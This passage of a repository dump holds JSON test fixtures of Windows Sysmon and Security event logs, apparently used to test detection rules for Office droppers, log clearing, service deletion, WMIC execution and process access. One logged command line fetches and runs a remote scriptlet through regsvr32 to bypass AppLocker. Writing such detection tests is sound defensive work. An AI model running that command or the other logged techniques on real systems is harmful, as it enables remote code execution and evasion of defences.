-------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CreationUtcTime": "2017-10-09 09:53:58.335", 5 | "Image": "C:\\Program Files (x86)\\Microsoft Office\\Office12\\WINWORD.EXE", 6 | "ProcessGuid": "49F1AF32-4730-59DB-0000-0010A9950700", 7 | "ProcessId": "2168", 8 | "TargetFilename": "C:\\Users\\Gen Eric\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC", 9 | "UtcTime": "4242-04-24 13:37:42.422" 10 | }, 11 | "System": { 12 | "Channel": "Microsoft-Windows-Sysmon/Operational", 13 | "Computer": "BLAHBLAH", 14 | "Correlation": {}, 15 | "EventID": "11", 16 | "EventRecordID": "21042", 17 | "Execution": { 18 | "ProcessID": "2160", 19 | "ThreadID": "2380" 20 | }, 21 | "Keywords": "0x8000000000000000", 22 | "Level": "4", 23 | "Opcode": "0", 24 | "Provider": { 25 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 26 | "Name": "Microsoft-Windows-Sysmon" 27 | }, 28 | "Security": { 29 | "UserID": "S-1-5-18" 30 | }, 31 | "Task": "11", 32 | "TimeCreated": { 33 | "SystemTime": "4242-04-24 13:37:42.422" 34 | }, 35 | "Version": "2" 36 | } 37 | } 38 | } 39 | -------------------------------------------------------------------------------- /tests/OfficeDropperExec.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "C:\\Programdata\\Q7Y9F5Z1.exe", 5 | "CurrentDirectory": "C:\\Users\\Gen Eric\\Documents\\", 6 | "Hashes": "SHA1=8D6DB316EA4E348021CB59CF3C6EC65C390F0497,MD5=36524C90CA1FAC2102E7653DFADB31B2,SHA256=FF808D0A12676BFAC88FD26F955154F8884F2BB7C534B9936510FD6296C543E8,IMPHASH=7CFC69E858A62E1E5A68D5510338C173", 7 | "Image": "C:\\ProgramData\\Q7Y9F5Z1.exe", 8 | "IntegrityLevel": "Medium", 9 | "LogonGuid": "{49F1AF32-651B-5ABB-0000-00205D120100}", 10 | "LogonId": "0x1125d", 11 | "ParentCommandLine": "\"C:\\Program Files (x86)\\Microsoft Office\\Office12\\EXCEL.EXE\" /e", 12 | "ParentImage": "C:\\Program Files 
(x86)\\Microsoft Office\\Office12\\EXCEL.EXE", 13 | "ParentProcessGuid": "{49F1AF32-001D-5AD6-0000-0010A0430D00}", 14 | "ParentProcessId": "2700", 15 | "ProcessGuid": "{49F1AF32-0032-5AD6-0000-00104E2E0E00}", 16 | "ProcessId": "2884", 17 | "TerminalSessionId": "1", 18 | "User": "GenEric-PC\\Gen Eric", 19 | "UtcTime": "4242-04-24 13:37:42.422" 20 | }, 21 | "System": { 22 | "Channel": "Microsoft-Windows-Sysmon/Operational", 23 | "Computer": "BLAHBLAH", 24 | "Correlation": {}, 25 | "EventID": "1", 26 | "EventRecordID": "36378", 27 | "Execution": { 28 | "ProcessID": "2948", 29 | "ThreadID": "3028" 30 | }, 31 | "Keywords": "0x8000000000000000", 32 | "Level": "4", 33 | "Opcode": "0", 34 | "Provider": { 35 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 36 | "Name": "Microsoft-Windows-Sysmon" 37 | }, 38 | "Security": { 39 | "UserID": "S-1-5-18" 40 | }, 41 | "Task": "1", 42 | "TimeCreated": { 43 | "SystemTime": "4242-04-24 13:37:42.422" 44 | }, 45 | "Version": "5" 46 | } 47 | } 48 | } 49 | { 50 | "Event": { 51 | "EventData": { 52 | "CommandLine": "C:\\Programdata\\Q1S5F1P6.exe", 53 | "CurrentDirectory": "C:\\Users\\Gen Eric\\Documents\\", 54 | "Hashes": "SHA1=8D6DB316EA4E348021CB59CF3C6EC65C390F0497,MD5=36524C90CA1FAC2102E7653DFADB31B2,SHA256=FF808D0A12676BFAC88FD26F955154F8884F2BB7C534B9936510FD6296C543E8,IMPHASH=7CFC69E858A62E1E5A68D5510338C173", 55 | "Image": "C:\\ProgramData\\Q1S5F1P6.exe", 56 | "IntegrityLevel": "Medium", 57 | "LogonGuid": "49F1AF32-6417-5A74-0000-002065780100", 58 | "LogonId": "0x00017865", 59 | "ParentCommandLine": "\"C:\\Program Files (x86)\\Microsoft Office\\Office12\\EXCEL.EXE\" /e", 60 | "ParentImage": "C:\\Program Files (x86)\\Microsoft Office\\Office12\\EXCEL.EXE", 61 | "ParentProcessGuid": "49F1AF32-64C3-5A74-0000-0010122C0900", 62 | "ParentProcessId": "1940", 63 | "ProcessGuid": "49F1AF32-64CC-5A74-0000-001069AB0900", 64 | "ProcessId": "2688", 65 | "TerminalSessionId": "1", 66 | "User": "GenEric-PC\\Gen Eric", 67 | "UtcTime": "4242-04-24 
13:37:42.422" 68 | }, 69 | "System": { 70 | "Channel": "Microsoft-Windows-Sysmon/Operational", 71 | "Computer": "BLAHBLAH", 72 | "Correlation": {}, 73 | "EventID": "1", 74 | "EventRecordID": "104856", 75 | "Execution": { 76 | "ProcessID": "1376", 77 | "ThreadID": "1964" 78 | }, 79 | "Keywords": "0x8000000000000000", 80 | "Level": "4", 81 | "Opcode": "0", 82 | "Provider": { 83 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 84 | "Name": "Microsoft-Windows-Sysmon" 85 | }, 86 | "Security": { 87 | "UserID": "S-1-5-18" 88 | }, 89 | "Task": "1", 90 | "TimeCreated": { 91 | "SystemTime": "4242-04-24 13:37:42.422" 92 | }, 93 | "Version": "5" 94 | } 95 | } 96 | } 97 | -------------------------------------------------------------------------------- /tests/Regsvr32ApplockerBypass.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "\"C:\\Windows\\system32\\regsvr32.exe\" /s /n /u /i:http://192.168.57.2:8080/TGnALEigHGs8.sct scrobj.dll", 5 | "Company": "Microsoft Corporation", 6 | "CurrentDirectory": "C:\\Users\\Gen Eric\\", 7 | "Description": "Microsoft(C) Register Server", 8 | "FileVersion": "6.1.7600.16385 (win7_rtm.090713-1255)", 9 | "Hashes": "SHA1=645C424974FBE5FE7A04CAC73F1C23C96E1570B8,MD5=59BCE9F07985F8A4204F4D6554CFF708,SHA256=CA24AEF558647274D019DFB4D7FD1506D84EC278795C30BA53B81BB36130DC57,IMPHASH=84DA4A3165E248148F65DBE03B98A436", 10 | "Image": "C:\\Windows\\System32\\regsvr32.exe", 11 | "IntegrityLevel": "Medium", 12 | "LogonGuid": "49F1AF32-DB3E-5A72-0000-00204F830100", 13 | "LogonId": "0x0001834f", 14 | "ParentCommandLine": "\"C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" ", 15 | "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", 16 | "ParentProcessGuid": "49F1AF32-DF5F-5A7A-0000-001028367201", 17 | "ParentProcessId": "1352", 18 | "ProcessGuid": "49F1AF32-DF73-5A7A-0000-0010D2E97201", 19 | "ProcessId": "1444", 20 | 
"Product": "Microsoft� Windows� Operating System", 21 | "TerminalSessionId": "1", 22 | "User": "GenEric-PC\\Gen Eric", 23 | "UtcTime": "4242-04-24 13:37:42.422" 24 | }, 25 | "System": { 26 | "Channel": "Microsoft-Windows-Sysmon/Operational", 27 | "Computer": "BLAHBLAH", 28 | "Correlation": {}, 29 | "EventID": "1", 30 | "EventRecordID": "5074393", 31 | "Execution": { 32 | "ProcessID": "1312", 33 | "ThreadID": "1884" 34 | }, 35 | "Keywords": "0x8000000000000000", 36 | "Level": "4", 37 | "Opcode": "0", 38 | "Provider": { 39 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 40 | "Name": "Microsoft-Windows-Sysmon" 41 | }, 42 | "Security": { 43 | "UserID": "S-1-5-18" 44 | }, 45 | "Task": "1", 46 | "TimeCreated": { 47 | "SystemTime": "4242-04-24 13:37:42.422" 48 | }, 49 | "Version": "5" 50 | } 51 | } 52 | } 53 | -------------------------------------------------------------------------------- /tests/SecurityLogClearing.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "UtcTime": "4242-04-24 13:37:42.422" 5 | }, 6 | "System": { 7 | "Channel": "Security", 8 | "Computer": "BLAHBLAH", 9 | "Correlation": {}, 10 | "EventID": "1102", 11 | "EventRecordID": "1056", 12 | "Execution": { 13 | "ProcessID": "700", 14 | "ThreadID": "1300" 15 | }, 16 | "Keywords": "0x4020000000000000", 17 | "Level": "4", 18 | "Opcode": "0", 19 | "Provider": { 20 | "Guid": "{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}", 21 | "Name": "Microsoft-Windows-Eventlog" 22 | }, 23 | "Security": { 24 | "UserID": "" 25 | }, 26 | "Task": "104", 27 | "TimeCreated": { 28 | "SystemTime": "4242-04-24 13:37:42.422" 29 | }, 30 | "Version": "0" 31 | } 32 | } 33 | } 34 | { 35 | "Event": { 36 | "EventData": { 37 | "UtcTime": "4242-04-24 13:37:42.422" 38 | }, 39 | "System": { 40 | "Channel": "Security", 41 | "Computer": "BLAHBLAH", 42 | "Correlation": {}, 43 | "EventID": "1102", 44 | "EventRecordID": "1057", 45 | "Execution": { 46 | "ProcessID": "700", 
47 | "ThreadID": "1636" 48 | }, 49 | "Keywords": "0x4020000000000000", 50 | "Level": "4", 51 | "Opcode": "0", 52 | "Provider": { 53 | "Guid": "{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}", 54 | "Name": "Microsoft-Windows-Eventlog" 55 | }, 56 | "Security": { 57 | "UserID": "" 58 | }, 59 | "Task": "104", 60 | "TimeCreated": { 61 | "SystemTime": "4242-04-24 13:37:42.422" 62 | }, 63 | "Version": "0" 64 | } 65 | } 66 | } 67 | -------------------------------------------------------------------------------- /tests/ServiceDeletion.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "sc.exe delete caldera", 5 | "Company": "Microsoft Corporation", 6 | "CurrentDirectory": "C:\\Windows\\system32\\", 7 | "Description": "Service Control Manager Configuration Tool", 8 | "FileVersion": "6.3.9600.16384 (winblue_rtm.130821-1623)", 9 | "Hashes": "SHA1=CA71AF6BB7B626333BB923D028CB333DCB153888,MD5=7AFDBA07926BE8AB1770CF59A35FF0B7,SHA256=B20BBD7B8B5707ACC00D7C51EF79771F22F2E201D4844252B675058EBEA9E416,IMPHASH=071BD0C605D6FDAEF2AD09AD6B4C0CF8", 10 | "Image": "C:\\Windows\\System32\\sc.exe", 11 | "IntegrityLevel": "System", 12 | "LogonGuid": "{8C352DC7-3282-5AC7-0000-0020E7030000}", 13 | "LogonId": "0x3e7", 14 | "ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c \"sc.exe delete caldera\"", 15 | "ParentImage": "C:\\Windows\\System32\\cmd.exe", 16 | "ParentProcessGuid": "{8C352DC7-3FAC-5AC7-0000-001099BC1300}", 17 | "ParentProcessId": "1636", 18 | "ProcessGuid": "{8C352DC7-3FAC-5AC7-0000-0010ADBE1300}", 19 | "ProcessId": "100", 20 | "Product": "Microsoft® Windows® Operating System", 21 | "TerminalSessionId": "0", 22 | "User": "NT AUTHORITY\\SYSTEM", 23 | "UtcTime": "4242-04-24 13:37:42.422" 24 | }, 25 | "System": { 26 | "Channel": "Microsoft-Windows-Sysmon/Operational", 27 | "Computer": "BLAHBLAH", 28 | "Correlation": {}, 29 | "EventID": "1", 30 | "EventRecordID": "242104", 31 | "Execution": { 32 | 
"ProcessID": "1568", 33 | "ThreadID": "1984" 34 | }, 35 | "Keywords": "0x8000000000000000", 36 | "Level": "4", 37 | "Opcode": "0", 38 | "Provider": { 39 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 40 | "Name": "Microsoft-Windows-Sysmon" 41 | }, 42 | "Security": { 43 | "UserID": "S-1-5-18" 44 | }, 45 | "Task": "1", 46 | "TimeCreated": { 47 | "SystemTime": "4242-04-24 13:37:42.422" 48 | }, 49 | "Version": "5" 50 | } 51 | } 52 | } 53 | { 54 | "Event": { 55 | "EventData": { 56 | "CommandLine": "sc.exe delete caldera", 57 | "Company": "Microsoft Corporation", 58 | "CurrentDirectory": "C:\\Windows\\system32\\", 59 | "Description": "Service Control Manager Configuration Tool", 60 | "FileVersion": "6.3.9600.16384 (winblue_rtm.130821-1623)", 61 | "Hashes": "SHA1=CA71AF6BB7B626333BB923D028CB333DCB153888,MD5=7AFDBA07926BE8AB1770CF59A35FF0B7,SHA256=B20BBD7B8B5707ACC00D7C51EF79771F22F2E201D4844252B675058EBEA9E416,IMPHASH=071BD0C605D6FDAEF2AD09AD6B4C0CF8", 62 | "Image": "C:\\Windows\\System32\\sc.exe", 63 | "IntegrityLevel": "System", 64 | "LogonGuid": "{8C352DC7-3282-5AC7-0000-0020E7030000}", 65 | "LogonId": "0x3e7", 66 | "ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c \"sc.exe delete caldera\"", 67 | "ParentImage": "C:\\Windows\\System32\\cmd.exe", 68 | "ParentProcessGuid": "{8C352DC7-3FAD-5AC7-0000-001037C31300}", 69 | "ParentProcessId": "2736", 70 | "ProcessGuid": "{8C352DC7-3FAD-5AC7-0000-00104DC51300}", 71 | "ProcessId": "2512", 72 | "Product": "Microsoft® Windows® Operating System", 73 | "TerminalSessionId": "0", 74 | "User": "NT AUTHORITY\\SYSTEM", 75 | "UtcTime": "4242-04-24 13:37:42.422" 76 | }, 77 | "System": { 78 | "Channel": "Microsoft-Windows-Sysmon/Operational", 79 | "Computer": "BLAHBLAH", 80 | "Correlation": {}, 81 | "EventID": "1", 82 | "EventRecordID": "242192", 83 | "Execution": { 84 | "ProcessID": "1568", 85 | "ThreadID": "1984" 86 | }, 87 | "Keywords": "0x8000000000000000", 88 | "Level": "4", 89 | "Opcode": "0", 90 | "Provider": { 91 | 
"Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 92 | "Name": "Microsoft-Windows-Sysmon" 93 | }, 94 | "Security": { 95 | "UserID": "S-1-5-18" 96 | }, 97 | "Task": "1", 98 | "TimeCreated": { 99 | "SystemTime": "4242-04-24 13:37:42.422" 100 | }, 101 | "Version": "5" 102 | } 103 | } 104 | } 105 | { 106 | "Event": { 107 | "EventData": { 108 | "CommandLine": "sc.exe delete caldera", 109 | "Company": "Microsoft Corporation", 110 | "CurrentDirectory": "C:\\Windows\\system32\\", 111 | "Description": "Service Control Manager Configuration Tool", 112 | "FileVersion": "6.3.9600.16384 (winblue_rtm.130821-1623)", 113 | "Hashes": "SHA1=CA71AF6BB7B626333BB923D028CB333DCB153888,MD5=7AFDBA07926BE8AB1770CF59A35FF0B7,SHA256=B20BBD7B8B5707ACC00D7C51EF79771F22F2E201D4844252B675058EBEA9E416,IMPHASH=071BD0C605D6FDAEF2AD09AD6B4C0CF8", 114 | "Image": "C:\\Windows\\System32\\sc.exe", 115 | "IntegrityLevel": "System", 116 | "LogonGuid": "{8C352DC7-3282-5AC7-0000-0020E7030000}", 117 | "LogonId": "0x3e7", 118 | "ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c \"sc.exe delete caldera\"", 119 | "ParentImage": "C:\\Windows\\System32\\cmd.exe", 120 | "ParentProcessGuid": "{8C352DC7-3FAF-5AC7-0000-0010D7C91300}", 121 | "ParentProcessId": "1324", 122 | "ProcessGuid": "{8C352DC7-3FAF-5AC7-0000-0010EBCB1300}", 123 | "ProcessId": "2756", 124 | "Product": "Microsoft® Windows® Operating System", 125 | "TerminalSessionId": "0", 126 | "User": "NT AUTHORITY\\SYSTEM", 127 | "UtcTime": "4242-04-24 13:37:42.422" 128 | }, 129 | "System": { 130 | "Channel": "Microsoft-Windows-Sysmon/Operational", 131 | "Computer": "BLAHBLAH", 132 | "Correlation": {}, 133 | "EventID": "1", 134 | "EventRecordID": "242284", 135 | "Execution": { 136 | "ProcessID": "1568", 137 | "ThreadID": "1984" 138 | }, 139 | "Keywords": "0x8000000000000000", 140 | "Level": "4", 141 | "Opcode": "0", 142 | "Provider": { 143 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 144 | "Name": "Microsoft-Windows-Sysmon" 145 | }, 146 | 
"Security": { 147 | "UserID": "S-1-5-18" 148 | }, 149 | "Task": "1", 150 | "TimeCreated": { 151 | "SystemTime": "4242-04-24 13:37:42.422" 152 | }, 153 | "Version": "5" 154 | } 155 | } 156 | } 157 | -------------------------------------------------------------------------------- /tests/StopSvchostAccess.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+4bf9a|C:\\Windows\\system32\\KERNELBASE.dll+189b7|C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll+2b86b7|UNKNOWN(000007FE941D519A)", 5 | "GrantedAccess": "0x1f1fff", 6 | "SourceImage": "C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe", 7 | "SourceProcessGUID": "49F1AF32-9930-5A1E-0000-0010593C0A00", 8 | "SourceProcessId": "2412", 9 | "SourceThreadId": "3348", 10 | "TargetImage": "C:\\Windows\\System32\\svchost.exe", 11 | "TargetProcessGUID": "49F1AF32-98FC-5A1E-0000-0010A7DA0000", 12 | "TargetProcessId": "820", 13 | "UtcTime": "4242-04-24 13:37:42.422" 14 | }, 15 | "System": { 16 | "Channel": "Microsoft-Windows-Sysmon/Operational", 17 | "Computer": "BLAHBLAH", 18 | "Correlation": {}, 19 | "EventID": "10", 20 | "EventRecordID": "145999", 21 | "Execution": { 22 | "ProcessID": "1324", 23 | "ThreadID": "1940" 24 | }, 25 | "Keywords": "0x8000000000000000", 26 | "Level": "4", 27 | "Opcode": "0", 28 | "Provider": { 29 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 30 | "Name": "Microsoft-Windows-Sysmon" 31 | }, 32 | "Security": { 33 | "UserID": "S-1-5-18" 34 | }, 35 | "Task": "10", 36 | "TimeCreated": { 37 | "SystemTime": "4242-04-24 13:37:42.422" 38 | }, 39 | "Version": "3" 40 | } 41 | } 42 | } 43 | { 44 | "Event": { 45 | "EventData": { 46 | "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+4bf9a|C:\\Windows\\system32\\KERNELBASE.dll+189b7|C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll+2b86b7|UNKNOWN(000007FE941D519A)", 47 | "GrantedAccess": 
"0x1f1fff", 48 | "SourceImage": "C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe", 49 | "SourceProcessGUID": "49F1AF32-9930-5A1E-0000-0010593C0A00", 50 | "SourceProcessId": "2412", 51 | "SourceThreadId": "3348", 52 | "TargetImage": "C:\\Windows\\System32\\svchost.exe", 53 | "TargetProcessGUID": "49F1AF32-98FC-5A1E-0000-0010A7DA0000", 54 | "TargetProcessId": "820", 55 | "UtcTime": "4242-04-24 13:37:42.422" 56 | }, 57 | "System": { 58 | "Channel": "Microsoft-Windows-Sysmon/Operational", 59 | "Computer": "BLAHBLAH", 60 | "Correlation": {}, 61 | "EventID": "10", 62 | "EventRecordID": "145999", 63 | "Execution": { 64 | "ProcessID": "1324", 65 | "ThreadID": "1940" 66 | }, 67 | "Keywords": "0x8000000000000000", 68 | "Level": "4", 69 | "Opcode": "0", 70 | "Provider": { 71 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 72 | "Name": "Microsoft-Windows-Sysmon" 73 | }, 74 | "Security": { 75 | "UserID": "S-1-5-18" 76 | }, 77 | "Task": "10", 78 | "TimeCreated": { 79 | "SystemTime": "4242-04-24 13:37:42.422" 80 | }, 81 | "Version": "3" 82 | } 83 | } 84 | } 85 | -------------------------------------------------------------------------------- /tests/SuspWMIC.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "Ancestors": "System|C:\\Windows\\System32\\smss.exe|C:\\Windows\\System32\\smss.exe|C:\\Windows\\System32\\winlogon.exe|C:\\Windows\\System32\\userinit.exe|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", 5 | "CommandLine": "\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" process call create C:\\Windows\\System32\\notepad.exe", 6 | "Company": "Microsoft Corporation", 7 | "CurrentDirectory": "\\\\vboxsvr\\test\\Exercises\\notepad-wmi\\", 8 | "Description": "WMI Commandline Utility", 9 | "FileVersion": "10.0.18362.1 (WinBuild.160101.0800)", 10 | "Hashes": 
"SHA1=CEEA1CA1D843C0CE456E347AFB58286CA60AF848,MD5=29B7D02A3B5F670B5AF2DAF008810863,SHA256=96BEC668680152DF51EC1DE1D5362C64C2ABA1EDA86F9121F517646F5DEC2B72,IMPHASH=2169BDA7AED3E42F1A59C8141542EC0C", 11 | "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe", 12 | "ImageSize": "508416", 13 | "IntegrityLevel": "Medium", 14 | "IntegrityTimeout": "false", 15 | "LogonGuid": "{515cd0d1-e1ec-5da6-0000-0020614b0300}", 16 | "LogonId": "0x34b61", 17 | "OriginalFileName": "wmic.exe", 18 | "ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ", 19 | "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", 20 | "ParentIntegrityLevel": "Medium", 21 | "ParentProcessGuid": "{515cd0d1-e23b-5da6-0000-0010605c1400}", 22 | "ParentProcessId": "6944", 23 | "ParentProcessIntegrity": "0", 24 | "ParentUser": "DESKTOP-LJRVE06\\Generic", 25 | "ProcessGuid": "{515cd0d1-e2c6-5da6-0000-0010e18b1900}", 26 | "ProcessId": "2072", 27 | "ProcessIntegrity": "-1", 28 | "Product": "Microsoft® Windows® Operating System", 29 | "RuleName": "", 30 | "Services": "N/A", 31 | "TerminalSessionId": "1", 32 | "User": "DESKTOP-LJRVE06\\Generic", 33 | "UtcTime": "4242-04-24 13:37:42.422" 34 | }, 35 | "System": { 36 | "Channel": "Microsoft-Windows-Sysmon/Operational", 37 | "Computer": "BLAHBLAH", 38 | "Correlation": {}, 39 | "EventID": "1", 40 | "EventRecordID": "11411880", 41 | "Execution": { 42 | "ProcessID": "2132", 43 | "ThreadID": "4820" 44 | }, 45 | "Keywords": "0x8000000000000000", 46 | "Level": "4", 47 | "Opcode": "0", 48 | "Provider": { 49 | "Guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", 50 | "Name": "Microsoft-Windows-Sysmon" 51 | }, 52 | "Security": { 53 | "UserID": "S-1-5-18" 54 | }, 55 | "Task": "1", 56 | "TimeCreated": { 57 | "SystemTime": "4242-04-24 13:37:42.422" 58 | }, 59 | "Version": "5" 60 | } 61 | } 62 | } 63 | { 64 | "Event": { 65 | "EventData": { 66 | "Ancestors": 
"System|C:\\Windows\\System32\\smss.exe|C:\\Windows\\System32\\smss.exe|C:\\Windows\\System32\\winlogon.exe|C:\\Windows\\System32\\userinit.exe|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\cmd.exe", 67 | "CommandLine": "wmic Process cAlL cReAte \"C:\\Windows\\System32\\notepad.exe\"", 68 | "Company": "Microsoft Corporation", 69 | "CurrentDirectory": "C:\\Windows\\", 70 | "Description": "WMI Commandline Utility", 71 | "FileVersion": "10.0.18362.1 (WinBuild.160101.0800)", 72 | "Hashes": "SHA1=CEEA1CA1D843C0CE456E347AFB58286CA60AF848,MD5=29B7D02A3B5F670B5AF2DAF008810863,SHA256=96BEC668680152DF51EC1DE1D5362C64C2ABA1EDA86F9121F517646F5DEC2B72,IMPHASH=2169BDA7AED3E42F1A59C8141542EC0C", 73 | "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe", 74 | "ImageSize": "508416", 75 | "IntegrityLevel": "Medium", 76 | "IntegrityTimeout": "false", 77 | "LogonGuid": "{515cd0d1-e1ec-5da6-0000-0020614b0300}", 78 | "LogonId": "0x34b61", 79 | "OriginalFileName": "wmic.exe", 80 | "ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c \"\"\\\\VBOXSVR\\test\\Exercises\\notepad-wmi\\start_notepad_wmi.bat\" \"", 81 | "ParentImage": "C:\\Windows\\System32\\cmd.exe", 82 | "ParentIntegrityLevel": "Medium", 83 | "ParentProcessGuid": "{515cd0d1-e333-5da6-0000-0010d9bb1a00}", 84 | "ParentProcessId": "1724", 85 | "ParentProcessIntegrity": "0", 86 | "ParentUser": "DESKTOP-LJRVE06\\Generic", 87 | "ProcessGuid": "{515cd0d1-e334-5da6-0000-0010efd71a00}", 88 | "ProcessId": "4240", 89 | "ProcessIntegrity": "0", 90 | "Product": "Microsoft® Windows® Operating System", 91 | "RuleName": "", 92 | "Services": "N/A", 93 | "TerminalSessionId": "1", 94 | "User": "DESKTOP-LJRVE06\\Generic", 95 | "UtcTime": "4242-04-24 13:37:42.422" 96 | }, 97 | "System": { 98 | "Channel": "Microsoft-Windows-Sysmon/Operational", 99 | "Computer": "BLAHBLAH", 100 | "Correlation": {}, 101 | "EventID": "1", 102 | "EventRecordID": "11412272", 103 | "Execution": { 104 | "ProcessID": "2132", 105 | "ThreadID": "4820" 106 | }, 107 | 
"Keywords": "0x8000000000000000", 108 | "Level": "4", 109 | "Opcode": "0", 110 | "Provider": { 111 | "Guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", 112 | "Name": "Microsoft-Windows-Sysmon" 113 | }, 114 | "Security": { 115 | "UserID": "S-1-5-18" 116 | }, 117 | "Task": "1", 118 | "TimeCreated": { 119 | "SystemTime": "4242-04-24 13:37:42.422" 120 | }, 121 | "Version": "5" 122 | } 123 | } 124 | } 125 | -------------------------------------------------------------------------------- /tests/SuspWriteAccess.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9c524|C:\\Windows\\System32\\KERNELBASE.dll+2730e|C:\\Windows\\system32\\conhost.exe+1260d|C:\\Windows\\system32\\conhost.exe+12505|C:\\Windows\\system32\\conhost.exe+895c|C:\\Windows\\system32\\conhost.exe+f2e6|C:\\Windows\\System32\\KERNEL32.DLL+17944|C:\\Windows\\SYSTEM32\\ntdll.dll+6ce71", 5 | "GrantedAccess": "0x1fffff", 6 | "RuleName": "", 7 | "SourceImage": "C:\\Windows\\system32\\fakedevent.exe", 8 | "SourceIntegrityLevel": "Medium", 9 | "SourceProcessGUID": "{515cd0d1-4ba0-5d3f-0000-0010ea641d00}", 10 | "SourceProcessId": "872", 11 | "SourceThreadId": "6236", 12 | "SourceUser": "DESKTOP-LJRVE06\\Generic", 13 | "TargetImage": "C:\\Windows\\Explorer.exe", 14 | "TargetIntegrityLevel": "Medium", 15 | "TargetParentProcessGuid": "{515cd0d1-4b9e-5d3f-0000-0010c9221d00}", 16 | "TargetProcessGUID": "{515cd0d1-4ba0-5d3f-0000-001087601d00}", 17 | "TargetProcessId": "4776", 18 | "TargetUser": "DESKTOP-LJRVE06\\Generic", 19 | "UtcTime": "4242-04-24 13:37:42.422" 20 | }, 21 | "System": { 22 | "Channel": "Microsoft-Windows-Sysmon/Operational", 23 | "Computer": "BLAHBLAH", 24 | "Correlation": {}, 25 | "EventID": "10", 26 | "EventRecordID": "7685513", 27 | "Execution": { 28 | "ProcessID": "892", 29 | "ThreadID": "1536" 30 | }, 31 | "Keywords": "0x8000000000000000", 32 | "Level": "4", 33 | "Opcode": 
"0", 34 | "Provider": { 35 | "Guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", 36 | "Name": "Microsoft-Windows-Sysmon" 37 | }, 38 | "Security": { 39 | "UserID": "S-1-5-18" 40 | }, 41 | "Task": "10", 42 | "TimeCreated": { 43 | "SystemTime": "4242-04-24 13:37:42.422" 44 | }, 45 | "Version": "3" 46 | } 47 | } 48 | } 49 | { 50 | "Event": { 51 | "EventData": { 52 | "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+5157a|C:\\Windows\\system32\\KERNELBASE.dll+d817|C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll+2c0e37|UNKNOWN(000007FF00290A6A)", 53 | "GrantedAccess": "0x1f1fff", 54 | "RuleName": "", 55 | "SourceImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", 56 | "SourceIntegrityLevel": "Medium", 57 | "SourceProcessGUID": "{49F1AF32-31E2-5D40-0000-00101A630800}", 58 | "SourceProcessId": "1124", 59 | "SourceThreadId": "2844", 60 | "SourceUser": "GenEric-PC\\Gen Eric", 61 | "TargetImage": "C:\\Windows\\Explorer.EXE", 62 | "TargetIntegrityLevel": "Medium", 63 | "TargetParentProcessGuid": "{49F1AF32-31A5-5D40-0000-0010655D0400}", 64 | "TargetProcessGUID": "{49F1AF32-31A5-5D40-0000-001084750400}", 65 | "TargetProcessId": "1996", 66 | "TargetUser": "GenEric-PC\\Gen Eric", 67 | "UtcTime": "4242-04-24 13:37:42.422" 68 | }, 69 | "System": { 70 | "Channel": "Microsoft-Windows-Sysmon/Operational", 71 | "Computer": "BLAHBLAH", 72 | "Correlation": {}, 73 | "EventID": "10", 74 | "EventRecordID": "7779909", 75 | "Execution": { 76 | "ProcessID": "1620", 77 | "ThreadID": "1868" 78 | }, 79 | "Keywords": "0x8000000000000000", 80 | "Level": "4", 81 | "Opcode": "0", 82 | "Provider": { 83 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 84 | "Name": "Microsoft-Windows-Sysmon" 85 | }, 86 | "Security": { 87 | "UserID": "S-1-5-18" 88 | }, 89 | "Task": "10", 90 | "TimeCreated": { 91 | 